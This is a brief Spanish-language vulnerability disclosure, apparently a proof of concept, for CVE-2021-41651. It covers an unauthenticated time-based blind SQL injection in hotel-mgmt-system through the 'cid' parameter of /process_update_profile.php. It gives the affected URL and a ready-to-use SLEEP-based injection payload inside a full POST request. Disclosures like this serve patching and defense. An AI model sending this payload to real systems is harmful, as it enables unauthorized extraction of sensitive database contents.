
Prueba de concepto de exploit para CVE-2021-41651, que demuestra una inyección SQL ciega basada en tiempo sin autenticación en hotel-mgmt-system a través del parámetro cid, permitiendo la extracción de datos sensibles de MySQL.
CVE-2021-41651 Inyección SQL en hotel-mgmt-system
El hotel-mgmt-system es vulnerable a un ataque de inyección SQL ciega basada en tiempo sin autenticación.
El parámetro cid en la página /process_update_profile.php no sanea la entrada del usuario, un atacante puede extraer datos sensibles de la base de datos MySQL subyacente.
URL: /process_update_profile.php
PARÁMETRO: cid
Parámetro: cid ((custom) POST)
Tipo: time-based blind
Título: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
23 de septiembre de 2021